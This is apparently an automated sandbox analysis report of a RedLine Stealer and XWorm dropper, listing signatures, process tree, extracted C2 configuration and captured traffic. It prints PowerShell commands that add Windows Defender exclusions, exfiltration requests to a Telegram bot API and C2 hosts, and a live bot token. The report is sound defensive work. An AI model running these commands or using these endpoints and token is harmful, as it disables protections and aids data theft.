Windows Analysis Report
Ekpb7jn7mf.exe

Overview

General Information

Sample name: Ekpb7jn7mf.exe (renamed because original name is a hash value)
Original sample name: 4CE2C0836C46C61B588972B56A23D5E2.exe
Analysis ID: 1474423
MD5: 4ce2c0836c46c61b588972b56a23d5e2
SHA1: 939a9f983870df1913acce63ca408bba9789588f
SHA256: 05df07e5e365386ae0917e177328bc12a2405a1c4317266127abb6903aac59b3
Tags: exe, RedLineStealer

Detection

RedLine, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ekpb7jn7mf.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\Ekpb7jn7mf.exe" MD5: 4CE2C0836C46C61B588972B56A23D5E2)
    • rKPaQokQ.exe (PID: 6480 cmdline: "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" MD5: DEAD69D07BC33B762ABD466FB6F53E11)
    • wjoqZlIS.exe (PID: 6528 cmdline: "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" MD5: EAB323FA6C66098BE1068FEF0A03BFF2)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YsrQekGS.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" MD5: 6EA393666ED89F758B30EA5037F5C22A)
      • powershell.exe (PID: 7380 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Calculator.exe (PID: 3804 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: XWorm
Description: Malware with wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
{"C2 url": ["45.88.186.18"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703"}
{"C2 url": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"}
{"C2 url": ["pst-child.gl.at.ply.gg:9336"], "Bot Id": "winsc"}
Yara matches on network capture (Source | Rule | Description | Author | Strings):
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Yara matches on dropped files (Source | Rule | Description | Author | Strings):
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8da6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8938:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Yara matches on memory dumps (Source | Rule | Description | Author | Strings):
00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp | Windows_Trojan_RedLineStealer_f54632eb | unknown | unknown
  • 0x133ca:$a4: get_ScannedWallets
  • 0x12228:$a5: get_ScanTelegram
  • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
  • 0x10e6a:$a7: <Processes>k__BackingField
  • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
  • 0x1079e:$a9: <ScanFTP>k__BackingField
00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8ba6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8c43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8d58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8738:$cnc4: POST / HTTP/1.1
Yara matches on unpacked PEs (Source | Rule | Description | Author | Strings):
4.0.YsrQekGS.exe.4b0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
4.0.YsrQekGS.exe.4b0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
4.0.YsrQekGS.exe.4b0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x8da6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8e43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8f58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8938:$cnc4: POST / HTTP/1.1
2.0.wjoqZlIS.exe.900000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.0.wjoqZlIS.exe.900000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

                            System Summary

Sigma matches (six rules matched the same process-start event; rule authors as listed by the report):
  • Florian Roth (Nextron Systems)
  • Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
  • Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
  • frack113
  • Florian Roth (Nextron Systems)
  • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Source: Process started
Data (identical for all six matches):
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
  CommandLine|base64offset|contains: L^rbs'2
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
  ParentImage: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe
  ParentProcessId: 6564
  ParentProcessName: YsrQekGS.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
  ProcessId: 7380
  ProcessName: powershell.exe
Snort alerts (Timestamp | SID | Source Port | Destination Port | Protocol | Classtype):
07/16/24-21:08:49.732554 | 2852874 | 7000 | 49746 | TCP | A Network Trojan was detected
07/16/24-21:09:07.854397 | 2852923 | 49746 | 7000 | TCP | A Network Trojan was detected
07/16/24-21:07:40.914617 | 2855924 | 49746 | 7000 | TCP | A Network Trojan was detected
07/16/24-21:09:07.853192 | 2852870 | 7000 | 49746 | TCP | A Network Trojan was detected
07/16/24-21:09:00.501675 | 2853193 | 49746 | 7000 | TCP | A Network Trojan was detected
2024-07-16T21:07:40.914617+0200 | 2855924 | 49746 | 7000 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:27.212960+0200 | 2033967 | 49745 | 443 | TCP | Misc activity
2024-07-16T21:07:13.916186+0200 | 2848200 | 49738 | 9336 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:08:49.732554+0200 | 2852874 | 7000 | 49746 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:09:07.854397+0200 | 2852923 | 49746 | 7000 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:11.118991+0200 | 2045001 | 9336 | 49730 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:08.760906+0200 | 2840787 | 49735 | 443 | TCP | Potentially Bad Traffic
2024-07-16T21:09:07.853192+0200 | 2852870 | 7000 | 49746 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:07.874705+0200 | 2045000 | 9336 | 49730 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:08.324582+0200 | 2046056 | 9336 | 49730 | TCP | A Network Trojan was detected
2024-07-16T21:07:08.868628+0200 | 2835930 | 49736 | 443 | TCP | Device Retrieving External IP Address Detected
2024-07-16T21:07:09.279083+0200 | 2835929 | 49736 | 443 | TCP | Device Retrieving External IP Address Detected
2024-07-16T21:07:27.532720+0200 | 2045615 | 49745 | 443 | TCP | Misc activity
2024-07-16T21:07:27.532720+0200 | 2853685 | 49745 | 443 | TCP | A Network Trojan was detected
2024-07-16T21:07:11.505252+0200 | 2849352 | 49737 | 9336 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:27.217238+0200 | 2029322 | 443 | 49745 | TCP | Misc activity
2024-07-16T21:09:00.501675+0200 | 2853193 | 49746 | 7000 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:08.872910+0200 | 2833693 | 443 | 49736 | TCP | Potential Corporate Privacy Violation
2024-07-16T21:07:58.125604+0200 | 2022930 | 443 | 49747 | TCP | A Network Trojan was detected
2024-07-16T21:07:19.836796+0200 | 2022930 | 443 | 49739 | TCP | A Network Trojan was detected
2024-07-16T21:07:08.369249+0200 | 2835928 | 53385 | 53 | UDP | Device Retrieving External IP Address Detected
2024-07-16T21:07:02.736165+0200 | 2849662 | 49730 | 9336 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:08.182096+0200 | 2849351 | 49730 | 9336 | TCP | Malware Command and Control Activity Detected
2024-07-16T21:07:26.559583+0200 | 2033966 | 61962 | 53 | UDP | Misc activity


                            AV Detection

Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 2.0.wjoqZlIS.exe.900000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["pst-child.gl.at.ply.gg:9336"], "Bot Id": "winsc"}
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | Malware Configuration Extractor: Xworm {"C2 url": ["45.88.186.18"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6", "Telegram URL": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703"}
Source: YsrQekGS.exe.6564.4.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage"}
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe | ReversingLabs: Detection: 95%
Source: Ekpb7jn7mf.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe | Joe Sandbox ML: detected
Source: Ekpb7jn7mf.exe | Joe Sandbox ML: detected
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: 45.88.186.18
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: 7000
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: <123456789>
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: <Xwormmm>
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: XWorm V5.6
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: USB.exe
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: bc1qwufsd77xxsjenyytmdlh9m6vv2m04md25fntkd
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: 0x8b3AcA40Aaa31E1C71F0478b556b555EBC8FDf55
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: TRcX5LoWZKep5z7QCqHHpdZEwWXHN9GBbv
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: 6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack | String decryptor: 6678411703
Source: Ekpb7jn7mf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Binary string: calc.pdbGCTL source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: calc.pdb source: rKPaQokQ.exe, 00000001.00000000.1665460578.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe, 00000001.00000002.1691517630.00007FF630CE2000.00000002.00000001.01000000.00000007.sdmp, rKPaQokQ.exe.0.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Ekpb7jn7mf.exe
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00409396
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe | Code function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DD0E

                            Networking

                            Source: Traffic | Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: Traffic | Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 45.88.186.18:7000 -> 192.168.2.4:49746
                            Source: Traffic | Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: Traffic | Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 45.88.186.18:7000 -> 192.168.2.4:49746
                            Source: Traffic | Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: Malware configuration extractor | URLs: 45.88.186.18
                            Source: Malware configuration extractor | URLs: pst-child.gl.at.ply.gg:9336
                            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 9336
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49730
                            Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 9336
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49737
                            Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 9336
                            Source: unknown | Network traffic detected: HTTP traffic on port 9336 -> 49738
                            Source: unknown | DNS query: name: api.telegram.org
                            Source: Yara match | File source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED
                            Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 147.185.221.20:9336
                            Source: global traffic | TCP traffic: 192.168.2.4:49746 -> 45.88.186.18:7000
                            Source: global traffic | HTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: pst-child.gl.at.ply.gg:9336 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" | Host: pst-child.gl.at.ply.gg:9336 | Content-Length: 144 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                            Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" | Host: pst-child.gl.at.ply.gg:9336 | Content-Length: 856137 | Expect: 100-continue | Accept-Encoding: gzip, deflate
                            Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" | Host: pst-child.gl.at.ply.gg:9336 | Content-Length: 856129 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                            Source: Joe Sandbox View | IP Address: 149.154.167.220
                            Source: Joe Sandbox View | IP Address: 147.185.221.20
                            Source: Joe Sandbox View | ASN Name: TELEGRAMRU
                            Source: Joe Sandbox View | ASN Name: ANONYMIZEEpikNetworkCH
                            Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknown | TCP traffic detected without corresponding DNS query: 45.88.186.18 (47 identical entries collapsed: the configured C2 address 45.88.186.18 is contacted repeatedly without any name lookup, which is what a bare-IP configuration looks like on the wire)
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 identical entries collapsed)
                            Source: global traffic | HTTP traffic detected: GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                            Source: global traffic | DNS traffic detected: DNS query: pst-child.gl.at.ply.gg
                            Source: global traffic | DNS traffic detected: DNS query: api.ip.sb
                            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                            Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: text/xml; charset=utf-8 | SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" | Host: pst-child.gl.at.ply.gg:9336 | Content-Length: 137 | Expect: 100-continue | Accept-Encoding: gzip, deflate | Connection: Keep-Alive
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
                            Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pst-child.gl.at.ply.gg
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pst-child.gl.at.ply.gg:9336
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pst-child.gl.at.ply.gg:9336/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
                            Source: powershell.exe, 0000000D.00000002.1800097184.00000205807EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://tempuri.org/
